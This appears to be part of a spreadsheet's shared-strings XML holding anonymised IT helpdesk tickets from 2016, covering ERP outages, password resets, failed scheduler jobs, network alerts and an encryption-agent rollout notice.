    <t>blade chassis HostName_1170 (ip 79.40.48.896) reporting "non critical" hardware issues.</t>
  </si>
  <si>
    <t xml:space="preserve">blade chassis HostName_1170 (ip 79.40.48.896) reporting "non critical" hardware issues._x000D_
_x000D_
_x000D_
hi team, _x000D_
_x000D_
with the new functionality and features that monitoring_tool provides us, we have started monitorixepyfbga wtqdyoinware sensors. we started receiving alerts for the HostName_1170 blade chassis (79.40.48.896). the iom sensor and in turn the chassis is reporting some "non critical" alerts. could you please investigate and advise? _x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: archive_idocs_daily_SID_39</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com
 abended job in job_scheduler: archive_idocs_daily_SID_39 at 08/17/16 14:07:31</t>
  </si>
  <si>
    <t>symantec endpoint encryption (see) agent roll out - europe region - only sales pc's</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yqlvfkih.folbpugd@gmail.com
dear folks,
i would like to thank all the site administrators whoever took part in this see agent pilot uacyltoe hxgayczeing and helped us through giving the honest feedbacks on the installation behavior time to time. this overall helped us to complete the full-fledge uacyltoe hxgayczeing and promote this package to the production rollout .
we have planned to deploy the see agent on the enclosed list of sales pc's across europe starting from 19th aug 2016 and i would presume that the site admins of sales location are in acceptance of starting this deployment from the above mentioned date (since this particular time framdntye has been announced a month back by scot trask as global communication)
in regard to this see agent rollout,  i would request you all to keep your respective location users informed about the deployment schedule, and also please ensure that all the users are familiar with the package installation steps (type of package, installation duration, importance of the package, mode of the installation, times of reboot and installation behavior) through referring the below details.
deployment date: - august 19th 2016 - friday
time: - 9.00 am in the morning (as per the respective location time zone)
deployment tool: - patching_antivirus_sw
package type: - prompted. user will be prompted with prior notification to save all the work before proceeding the installation through clicking the continue button.
duration: - 10 - 15 minutes
restart required: -  yes (automatic restart after the installation of see agent)
package behavior: - please ask the sales users to go through the below provided bill bankrd and understand the importance of the package deployment .
[cid:image001.jpg@01d1f8c2.4c71b800]
we have uacyltoe hxgayczeed, validated and finalized the see agent deployment for our production environment.
if any of the pc's from our deployment target list is not associated to the sales pc or got replaced or removed from the network, please do let us know via providing the comment on the separate column of the same enclosed target list (crm sales pc - see europe targetlist_64bit.xlsx  &amp; crm sales pc - see europe targetlist_32bit.xlsx), will exclude those pc's completely from this deployment.
all vip and critical/machine pc's should be done manually by the respective it/site contact. for the manual installation, both site admin and the users must have the local admin privileges on the respective pc's to complete the see agent installation without any issue's.
please access the following server share for manual installation (user must be either on office lan or vpn network to access the server share as provided).
\\HostName_497\see-agent-deploy&lt;file://HostName_497/see-agent-deploy&gt;
( to install on windows 32 bit systems) -  please execute the exe file which is under 32 bit folder of the above server share
( to install on windows 64 bit systems) - please execute the exe file which is under 64 bit folder of the above server share.
</t>
  </si>
  <si>
    <t>yqlvfkih folbpugd</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1379</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1379 at 08/17/16 13:47:30</t>
  </si>
  <si>
    <t>unable to restore pc from hibernation after reimage to 64 bit</t>
  </si>
  <si>
    <t xml:space="preserve">pc fails to restore from hibernation after re imaging to 64 bit os
after running on battery backup for 2 hours, the pc automatically goes into hibernation, causing massive data loss.
please treat this on priority
pc details
pc name: aidl8912264
windows os: windows 7 sp1 64 bit
ramdnty: 8 gb
contact # </t>
  </si>
  <si>
    <t>unable to execute job_scheduler jobs post client upgrades on HostName_773,HostName_1311,HostName_1321 and HostName_1319</t>
  </si>
  <si>
    <t>i do not have access to ethics training module</t>
  </si>
  <si>
    <t xml:space="preserve">error message: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t>
  </si>
  <si>
    <t>fhbvisgc cbxpgkwl</t>
  </si>
  <si>
    <t>reset passwords for andrdgrtew p taneghrty using password_management_tool password reset.</t>
  </si>
  <si>
    <t>tjzohmve wusgaozx</t>
  </si>
  <si>
    <t>erp consignment zkea issue with creating duplicate kb orders</t>
  </si>
  <si>
    <t>order 35867766 zkea was created and erp generated 2 fill orders, zkb orders. order 35867760 and 35867772. see screenshot in email attached. erp should have created only 1 fill kb order. customer receive duplicate fills and will be returning the product</t>
  </si>
  <si>
    <t>o drive missing in machine.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to ess </t>
  </si>
  <si>
    <t>dtapgezb hezmtdgo</t>
  </si>
  <si>
    <t xml:space="preserve">laptop damaged as it fell in flight </t>
  </si>
  <si>
    <t xml:space="preserve">from: prarthyr jha 
sent: wednesday, august 17, 2016 4:40 pm
to: nwfodmhc exurcwkm
subject: amar fw: gt1z262- jhapg -issue
hi,
please refer attached photo ,laptop damaged due to fall in flight.
at present system in working condition, with no issues.
with repeated use hinges and seating might become problematic.
please help.
latitude 7350.
computer name - aiml9912338
user-  jhapg
system id â€“ gt1z262
employee code â€“ 202467809
</t>
  </si>
  <si>
    <t>jtqaplhs yjmpiqcu</t>
  </si>
  <si>
    <t xml:space="preserve">lhqsl909 and HostName_899 needs to be added to the log on account for bdclient1 </t>
  </si>
  <si>
    <t xml:space="preserve">lhqsl909 and HostName_899 needs to be added to the log on account for bdclient1 
name:mikhghytr
language:
browser:microsoft internet explorer
email:ekjobdiz.ktelzwvg@gmail.com
customer number:
telephone:
summary:is there an active directory setting that allows an user id to access the company access points companysecure?
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1387</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1387 at 08/17/16 11:27:32</t>
  </si>
  <si>
    <t>gwkdsmfx.ntorypsd@gmail.com password reset</t>
  </si>
  <si>
    <t>problem with wlan in germany, germany for the attached device.</t>
  </si>
  <si>
    <t>problem with wlan in germany, germany for the attached device. contact yevirgnl ylhogjct for further info._x000D_
_x000D_
mac address: e8b7484d2f72</t>
  </si>
  <si>
    <t>usa - robot (server cabinet) pc lhnw8222138 is down since 10:37am on 08/17/16</t>
  </si>
  <si>
    <t>re: erp SID_34 access rights</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vipqmdse.zkaowfrx@gmail.com
approved ragini.
davidthd j wgtyills
vice president
vipqmdse.zkaowfrx@gmail.com&lt;mailto:vipqmdse.zkaowfrx@gmail.com&gt;
</t>
  </si>
  <si>
    <t>vipqmdse zkaowfrx</t>
  </si>
  <si>
    <t>manually reset erp password  as the password from the previous reset through password_management_tool did not work.</t>
  </si>
  <si>
    <t xml:space="preserve">have a new phone, my exchange server is blocked. can you release it so that mail come in? </t>
  </si>
  <si>
    <t>problem with wlan in germany, germany for the attached device. contact yevirgnl ylhogjct for further info.</t>
  </si>
  <si>
    <t>outlook freezing while opeyctrhbkm plvnuxmrils</t>
  </si>
  <si>
    <t>hfvuzmbs vjtsakfb</t>
  </si>
  <si>
    <t>erp error mesg "order does not exist" when trying to run apo and create a delivery</t>
  </si>
  <si>
    <t xml:space="preserve">erp error mesg "order does not exist" when trying to run apo and create a delivery for order 35886433 and order 35922308 getting error mesg "value of modific. counter for doc. 1146033419 in supply_chain is: 09, but should be :1" see attachments._x000D_
</t>
  </si>
  <si>
    <t>email access to mobile device.</t>
  </si>
  <si>
    <t>HostName_891 backup server offline/missing virtual drives</t>
  </si>
  <si>
    <t xml:space="preserve">physical backup server HostName_891 is down._x000D_
we found that physical disks 4 and 6 have failed(attached screenshot). _x000D_
HostName_891 backup server offline/missing virtual drives._x000D_
drac ip 29.60.76.431_x000D_
</t>
  </si>
  <si>
    <t>kybgepnj idszleru</t>
  </si>
  <si>
    <t>202 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1089/10.2.1</t>
  </si>
  <si>
    <t>dsw in33627670_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we have detected at least 202 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1089/41.53.25.402 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:_x000D_
 1. an infection on this host_x000D_
 2. a misconfigured firewall_x000D_
 3. a misconfigured host_x000D_
 4. port scan (authorized or unauthorized)</t>
  </si>
  <si>
    <t>chat transfer</t>
  </si>
  <si>
    <t xml:space="preserve">update my erp favorites </t>
  </si>
  <si>
    <t xml:space="preserve">company screensaver not on the computer </t>
  </si>
  <si>
    <t>unable to load webpage</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1853</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1853 at 08/17/16 09:18:31</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1402</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1402 at 08/17/16 09:16:31</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1403</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1403 at 08/17/16 09:16:31</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1417</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1417 at 08/17/16 09:16:31</t>
  </si>
  <si>
    <t>unable to change quotation.</t>
  </si>
  <si>
    <t>kis bug fixes and corrections</t>
  </si>
  <si>
    <t xml:space="preserve">kis bug fixes and corrections </t>
  </si>
  <si>
    <t>unable to access ms dynamics crm companyprod environment</t>
  </si>
  <si>
    <t xml:space="preserve">error: insufficient access_x000D_
_x000D_
please check attached email for error screenshot and contact details._x000D_
_x000D_
i believe licenses were recently provided._x000D_
</t>
  </si>
  <si>
    <t>not able to login to windows.</t>
  </si>
  <si>
    <t>we are unable to clear this inwarehouse_tool from vfx3.</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
can you please support here._x000D_
_x000D_
we are unable to clear this inwarehouse_tool from vfx3._x000D_
_x000D_
we need help as this is a high value inwarehouse_tool which we cannot clear._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>account unlock.</t>
  </si>
  <si>
    <t>Ä± cant connect netviewer</t>
  </si>
  <si>
    <t>Ä± connected at vpn after Ä± saw main screen of netviewer.Ä± wrote usrr name and password after Ä± see error screen .Ä± attached this screen</t>
  </si>
  <si>
    <t>ouqwcehj amtqxvpg</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1854</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1854 at 08/17/16 08:39:32</t>
  </si>
  <si>
    <t>abended job in job_scheduler: hrp_SID_34_chg_point</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: hrp_SID_34_chg_point at 08/17/16 08:39:32</t>
  </si>
  <si>
    <t>erp SID_34 access rights</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: npvmwszt.gzcpejxv@gmail.com
dear global helpdesk team,
we wanted to request you for the access right for rfvchzmp picjthkd as same of the user "bagtylleg" zsluxctw ptirhcwv in erp logon SID_34 system.
davidthd, can you kindly approve the request so that it can provide the access to stefdgthy.
warm </t>
  </si>
  <si>
    <t>npvmwszt gzcpejxv</t>
  </si>
  <si>
    <t>material tax classifications zero</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hpmwliog.kqtnfvrl@gmail.com_x000D_
_x000D_
please open an it ticket and assign to rzucjgvp ioqjgmah._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>no response on call</t>
  </si>
  <si>
    <t>password reset - ad</t>
  </si>
  <si>
    <t>cyndy emailed requesting for password reset for jose. _x000D_
emailed her the password.</t>
  </si>
  <si>
    <t>dxqwftir hbknpyzf</t>
  </si>
  <si>
    <t>mss access is missing</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: omrsiqdv.iwhcpgoa@gmail.com
hi team,
my mss access is missing and i need to have the access for raising job requisition. please help to fix it.
[cid:image001.png@01d1f8c1.b68633c0]
tiffrtany tafgtyng
manager hr shared services, asia pacific
omrsiqdv.iwhcpgoa@gmail.com&lt;mailto:omrsiqdv.iwhcpgoa@gmail.com&gt;
?????????????????????????????????????????????????????????????????????????????????????????????
[
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>omrsiqdv iwhcpgoa</t>
  </si>
  <si>
    <t>thomklmas contacted us during the outage when a core switch in the usa nvyjtmca xjhpznds went down._x000D_
he was able to confirm access was restored once the switch came back up.</t>
  </si>
  <si>
    <t>please delete calander meetings in kurtyar v1 (suzjhmfa swmiynoz) outlook</t>
  </si>
  <si>
    <t xml:space="preserve">please delete calendar meetings in kurtyar v1 (suzjhmfa swmiynoz) outlook. employee has left the company and request you to kindly delete following meetings from his calendar:_x000D_
aug 19, _x000D_
sep 09 &amp; sep 30_x000D_
oct 21, _x000D_
nov 11, _x000D_
dec2 &amp; dec23_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>ymapungc kzaintyu</t>
  </si>
  <si>
    <t>no access to ethics training</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
i can't accede to my ethics training. my user is unrecognized. could you please check it? please see the attached screen_x000D_
</t>
  </si>
  <si>
    <t>outage - core swicth in usa dac went down</t>
  </si>
  <si>
    <t>colin was unable to access some sql databases. advised of the outage._x000D_
he was able to confirm that issue was resolved once the core switch came back up.</t>
  </si>
  <si>
    <t>tmjowelq ojvkxlyd</t>
  </si>
  <si>
    <t>outlook is not opening.</t>
  </si>
  <si>
    <t>please unlock the SID_78user at sar r/3</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cbupnjzo.daflthkw@gmail.com_x000D_
_x000D_
please unlock the SID_78user at sar r/3_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>new windows 7 pc lpgw8517786 cannot connect to the rfid reader via rs232 port</t>
  </si>
  <si>
    <t>bitte precimat nr.2468 freischalten</t>
  </si>
  <si>
    <t>bitte die maschine precimat 1 nr.2468 wieder freischalten._x000D_
ja ,unter azm</t>
  </si>
  <si>
    <t>password reset to login to erp hcm to be able to use or apply jobs in company</t>
  </si>
  <si>
    <t>ewlmcqsh usdlfbkh</t>
  </si>
  <si>
    <t>erp is not working. error : log on balancing error.</t>
  </si>
  <si>
    <t xml:space="preserve">inc1542327 : cert opened. _x000D_
work around </t>
  </si>
  <si>
    <t>btuqmzvs wscahikd</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_32arc2</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_32arc2 at 08/17/16 06:25:30</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 log out </t>
  </si>
  <si>
    <t>india cec are having issues with erp SID_34 production, system is logging out automatically and happened more than 5 times as of now.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1142</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1142 at 08/17/16 06:12:30</t>
  </si>
  <si>
    <t>reset the password for  on erp / production / erp</t>
  </si>
  <si>
    <t xml:space="preserve">please reset password for SID_78user, old erp 4,6, is locked now,_x000D_
</t>
  </si>
  <si>
    <t>erp logon does not open</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qjtbrvfy.avwqmhsp@gmail.com_x000D_
_x000D_
hello helpline,_x000D_
_x000D_
i need erp very urgent today, but cannot connect from my computerâ€¦_x000D_
[cid:image001.png@01d1f87e.5996d540]_x000D_
_x000D_
[cid:image002.png@01d1f87e.5996d540]_x000D_
_x000D_
the user itself is not blocked, i tried it from a colleagues pc._x000D_
_x000D_
please advice._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">erp down , internet down in usa pa location </t>
  </si>
  <si>
    <t xml:space="preserve">erp down , internet down in usa pa location .
contact # : </t>
  </si>
  <si>
    <t>server down</t>
  </si>
  <si>
    <t xml:space="preserve">e00462 - error reading object details: the process has been canceled: error at execute transaction /dscsag/obj_get_multidetail2: connect to message server host failed
connection paramdntyeters: type=b dest=nogui mshost=SID_34-db r3name=SID_34 group=erp production pcs=1
phone : </t>
  </si>
  <si>
    <t>jdmwugop dklawfoy</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_3049</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_3049 at 08/17/16 05:48:31</t>
  </si>
  <si>
    <t>server probleme</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jxlekivs.fwakmztv@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
die server verbindung in lic ist gestÃ¶rt, es kann nicht in erp gebucht werden. kÃ¶nnen sie sich des problems annehmen, danke._x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>jxlekivs fwakmztv</t>
  </si>
  <si>
    <t>erp SID_34 - system doesn't work - no production orders can be entered</t>
  </si>
  <si>
    <t>contact: +49-230877</t>
  </si>
  <si>
    <t>slbfmqpa qdroplyz</t>
  </si>
  <si>
    <t xml:space="preserve">erp is not working </t>
  </si>
  <si>
    <t>no connection to the erp system</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
we have no connection to the erp system._x000D_
_x000D_
no connection to the message server (rc = 9 )_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qyndvmlw imcvznow</t>
  </si>
  <si>
    <t>connecting with erp not possible</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yfmaqovp.wdonhbez@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
we need your  help a.s.a.p._x000D_
connecting with erp is not possible._x000D_
we receive this error message._x000D_
_x000D_
[cid:image001.png@01d1f87c.10671411]_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>abended job in job_scheduler: pp_EU_tool_netch_keheu1</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: pp_EU_tool_netch_keheu1 at 08/17/16 05:38:31</t>
  </si>
  <si>
    <t>erp not working : erp outage.</t>
  </si>
  <si>
    <t xml:space="preserve">erp not working : erp outage.
aeophctw nvjyhizu : united kingdom : </t>
  </si>
  <si>
    <t>erp is broken down</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cbupnjzo.daflthkw@gmail.com_x000D_
_x000D_
please see error message from erp._x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f87b.b6974d90]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen, best </t>
  </si>
  <si>
    <t>abended job in job_scheduler: mm_zscr0099_dly_uschow1</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: mm_zscr0099_dly_uschow1 at 08/17/16 05:34:31</t>
  </si>
  <si>
    <t xml:space="preserve">erp not connecting 
</t>
  </si>
  <si>
    <t>nritedlm ihaufdol</t>
  </si>
  <si>
    <t>erp SID_34 is not working</t>
  </si>
  <si>
    <t>plant germany can not log in.+</t>
  </si>
  <si>
    <t xml:space="preserve">erp logon not possible after the error , multiple users affected </t>
  </si>
  <si>
    <t xml:space="preserve">please see the error message attached </t>
  </si>
  <si>
    <t>probleme mit scanner und drucker \zslugaxq dtwlrofu</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
bei frau gÃ¶dde ist der drucker nicht i.o.._x000D_
_x000D_
1. wenn sie etwas scannt, ist der scan grÃ¼n_x000D_
2. sie kann nichts ausdrucken. der drucker springt zwar an aber es kommt nichts raus._x000D_
</t>
  </si>
  <si>
    <t>zslugaxq dtwlrofu</t>
  </si>
  <si>
    <t>probleme mit office365  \ girnda</t>
  </si>
  <si>
    <t>wnyeczkb eqpjcukv</t>
  </si>
  <si>
    <t>setup new ws \gonzales</t>
  </si>
  <si>
    <t>hp alm triggered not  shown up in inbox</t>
  </si>
  <si>
    <t>:
summary:actually the emails from hp alm triggered not 
 shown up in inbox</t>
  </si>
  <si>
    <t>nftpwqsl hgmkrtqv</t>
  </si>
  <si>
    <t>i cannot print out erp documents on zz_mails functions since today around noon. please help.</t>
  </si>
  <si>
    <t>i want to print out erp documents as pdf file from zz_mails function. i tried to do it since today's noon for sales document, delivery document, and billing document but nothing comes until now.</t>
  </si>
  <si>
    <t>alte it equipment abholen \wxstfouy isjzcotm</t>
  </si>
  <si>
    <t>probleme mit anmelden.  \wxstfouy isjzcotm</t>
  </si>
  <si>
    <t xml:space="preserve">leider kann ich mich nicht an meinem rechner anmelden. _x000D_
_x000D_
fehlermeldung: â€ž die verstrauensstellung zwischen dieser arbeitsstation und der primÃ¤ren domÃ¤ne konnte nicht hergestellt werden"_x000D_
</t>
  </si>
  <si>
    <t>network outage at usa pa. location : plant</t>
  </si>
  <si>
    <t xml:space="preserve">network outage at usa pa.
intranet and internet both are affected (erp + outlook ...)
contact : </t>
  </si>
  <si>
    <t>svuxizgr mkynswqd</t>
  </si>
  <si>
    <t>internet not working in usa location.</t>
  </si>
  <si>
    <t>phone lines were down too but now  its working fine.
outlook says : connecting to server.
contact # :</t>
  </si>
  <si>
    <t>engineering_drawing_tool rahmen kann nicht geladen werden</t>
  </si>
  <si>
    <t>engineering_drawing_tool lÃ¤dt keine zeichnungsrahmen, es kommt die meldung aus dem anhang</t>
  </si>
  <si>
    <t>dknzygjt bscvykei</t>
  </si>
  <si>
    <t>laptop not switching on</t>
  </si>
  <si>
    <t>laptop not starting</t>
  </si>
  <si>
    <t>getting warning messages in outloo while sending out emails via macro function - how can i disable the warning messages?</t>
  </si>
  <si>
    <t>dn#80579343999-sales org. 1322(plant_69)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jvxmzteb.vsdcnfyr@gmail.com_x000D_
_x000D_
hellp it help_x000D_
please refer to the below delivery note number_x000D_
we are not able to return pgi, please help on this._x000D_
[cid:image001.png@01d1f8aa.ee338e60]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jvxmzteb vsdcnfyr</t>
  </si>
  <si>
    <t>erp hana studio ( sidecar )  software is not working</t>
  </si>
  <si>
    <t>reset the password for szcbhvwe edpouqjl on erp / production / erp</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team, _x000D_
_x000D_
can you please be so kind and reset franhtyuÂ´s password to daypay3?_x000D_
</t>
  </si>
  <si>
    <t>szcbhvwe edpouqjl</t>
  </si>
  <si>
    <t>zz_mails : unable to send quotations to customer /sales</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: afwzehqs.jfbxegac@gmail.com_x000D_
_x000D_
hello team_x000D_
_x000D_
we are unable to send any quotations to customer or sales through zz_mails._x000D_
_x000D_
please check and resolve immediately._x000D_
_x000D_
example: 3116105044 was sent to afwzehqs.jfbxegac@gmail.com&lt;mailto:afwzehqs.jfbxegac@gmail.com&gt; but not received._x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>afwzehqs jfbxegac</t>
  </si>
  <si>
    <t xml:space="preserve"> meeting inivation no skype åŠ è½½é¡¹</t>
  </si>
  <si>
    <t xml:space="preserve"> meeting inivation no skype åŠ è½½é¡¹ ã€‚</t>
  </si>
  <si>
    <t>ynmcplev qpgctajz</t>
  </si>
  <si>
    <t>erp logon SID_34 &amp; SID_37</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kbclinop.vsczklfp@gmail.com_x000D_
_x000D_
hi,_x000D_
i have been trying but couldn't set my erp logon to same window login password.  please help to reset my erp login, and configure to the same as per my window login pw._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> windows disk space utilization alert  :: HostName_19 </t>
  </si>
  <si>
    <t>password not working for user : frgtyetij</t>
  </si>
  <si>
    <t xml:space="preserve">
from: qwvpgayb amniujsh 
sent: wednesday, august 17, 2016 12:18 pm
to: nwfodmhc exurcwkm
cc: gaiopkun bvcdpxrt; qamyesuv npmzxbek
subject: fw: sab : gaiopkun bvcdpxrt password issue
importance: high
hi team,
rubiargty changed the password a few times already but the issue remains the same : julgttie cannot log in.
can you please investigate aerp because our new sales engineer needs to work on customers immediately ?
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: pp_EU_tool_netch_ap1</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: pp_EU_tool_netch_ap1 at 08/17/16 03:41:32</t>
  </si>
  <si>
    <t xml:space="preserve">windows disk space utilization alert ::: lhbsm005 </t>
  </si>
  <si>
    <t>firewall company-internal-pix.company.com at ltrobe is down since 1:43am et on 08/17.</t>
  </si>
  <si>
    <t>firewall company-internal-pix.company.com (10.32.100.18) at ltrobe is down since 1:43am et on 08/17.</t>
  </si>
  <si>
    <t xml:space="preserve">windows disk space utilization alert for  :: HostName_106 </t>
  </si>
  <si>
    <t xml:space="preserve">windows disk space utilization alert for  :: HostName_106 _x000D_
</t>
  </si>
  <si>
    <t>scanners down (especially scn to email is not working)</t>
  </si>
  <si>
    <t xml:space="preserve">server ip : 10.32.1.101 ( no reply to ping) smtp server
error : communication error.
contact : 
server name : not known
server location : usa 
</t>
  </si>
  <si>
    <t>document sent out via zz_mails can't be received in time</t>
  </si>
  <si>
    <t xml:space="preserve">i made a uacyltoe hxgaycze as sent document 7611183197 to my own email address via zz_mails at 3 pm (apac time).
but 30 mins later, it still has not been received.
</t>
  </si>
  <si>
    <t>yxmutzwf fxoidlku</t>
  </si>
  <si>
    <t>zz_mails is not working</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team, _x000D_
today our zz_mails is not working, can you please check what happened?_x000D_
</t>
  </si>
  <si>
    <t>storage of 3d machine assembly models.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cyxzfvtj.yklmvqxf@gmail.com_x000D_
_x000D_
1.       need a common place for online  storage of 3d complete machine assembly models at one place. presently the drawings are in individual designer's pcs and retrieval is difficult._x000D_
                day by day as more &amp; more machines are designed in 3d the data handling is going out of control._x000D_
_x000D_
2.       common place (separate drive)  under administrative control to save and view these complete machine assembly models._x000D_
_x000D_
3.       periodic back up &amp; archiving of data stored at this place._x000D_
_x000D_
_x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>cyxzfvtj yklmvqxf</t>
  </si>
  <si>
    <t>keine azm-meldungen mÃ¶glich</t>
  </si>
  <si>
    <t>im EU_tool lassen sich keine azm-meldungen eintragen_x000D_
_x000D_
in EU_tool, azm messages can not be registered.</t>
  </si>
  <si>
    <t>arkmtcig adpsrxjc</t>
  </si>
  <si>
    <t>the interface 'gi7/3';'te6/1;gi7/11 and gi8/15 in bottom-6509-msfc720 switch at usa is down since 2:00am et on 08/17</t>
  </si>
  <si>
    <t>global it-germany-erp- "send output with email" does not works!!!</t>
  </si>
  <si>
    <t xml:space="preserve">good day dear all,_x000D_
please help me aerp, so that the erp-"output sending with email" will work as well as yesterday!_x000D_
</t>
  </si>
  <si>
    <t>jdynzuim uapkdvgr</t>
  </si>
  <si>
    <t>urgent : ordering from purchasing catalogue not working</t>
  </si>
  <si>
    <t>ordering from purchasing catalogue not working, unable to order. please see the attachments.</t>
  </si>
  <si>
    <t>log on erp, password need to change</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gvderpbx.udrzjxkm@gmail.com
hi, please assist
i had to change my windows password as it was about to expire.
now i can't log in on erp.
username bragtydlc
employee nr 700104
please assist aerp.
</t>
  </si>
  <si>
    <t>issues when processing t&amp;d requests - urgent</t>
  </si>
  <si>
    <t xml:space="preserve">please help to look into the issues i got in attachment. </t>
  </si>
  <si>
    <t>urgent!! erp outputs not generated</t>
  </si>
  <si>
    <t xml:space="preserve">all users in poland encounter issue with erp outputs (see the error message attached) </t>
  </si>
  <si>
    <t>my screen would beshryuout momentarily and return with the following "display driver stopped responding and has recovered"</t>
  </si>
  <si>
    <t xml:space="preserve">i have just changed my laptop recently and after the change, every time i used microsoft excel dealing with huge information, my screen would beshryu out momentarily with the following message "display driver stopped responding and has recovered."  this beshryu out could happen as often as every 5-10 minutes when i am using excel. _x000D_
_x000D_
twice it was so bad that the screen turn blue with some information on crash dump and i have to force re-start my laptop. </t>
  </si>
  <si>
    <t>qulnmvxa gznxlcts</t>
  </si>
  <si>
    <t>robot lhqw8325925sf at usa is inactive since 1:54am et on 08/17.</t>
  </si>
  <si>
    <t>20160816 plant_308 label error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bjrtfeyi.fuqapwtv@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
when the operator print plant_308 label, he click "made in plant_308" there is no information as below correct screenshot._x000D_
could you help to solve the error, please? </t>
  </si>
  <si>
    <t>HostName_755 EU_tool server restart required</t>
  </si>
  <si>
    <t>please restart the server aerp and check if it works again. EU_tool is not working for germany plant. our it-partner is on vacation.</t>
  </si>
  <si>
    <t>connection to 'admin2-datacenter-switch04' ;switch05 &amp; admin2-datacenter-switch06 is down at latrosince 1:40am et 08/17.</t>
  </si>
  <si>
    <t>connection to 'admin2-datacenter-switch04' (ping) failed  (ip: 71.62.89.948 , profile: admin2-datacenter-switch04)_x000D_
connection to 'admin2-datacenter-switch05' (ping) failed  (ip: 75.16.41.846 , profile: admin2-datacenter-switch05)_x000D_
connection to 'admin2-datacenter-switch06' (ping) failed  (ip: 28.12.01.025 , profile: admin2-datacenter-switch06)</t>
  </si>
  <si>
    <t>pls help to change the internal order number 717625 from cost center cnn010 to  cplant_2412.</t>
  </si>
  <si>
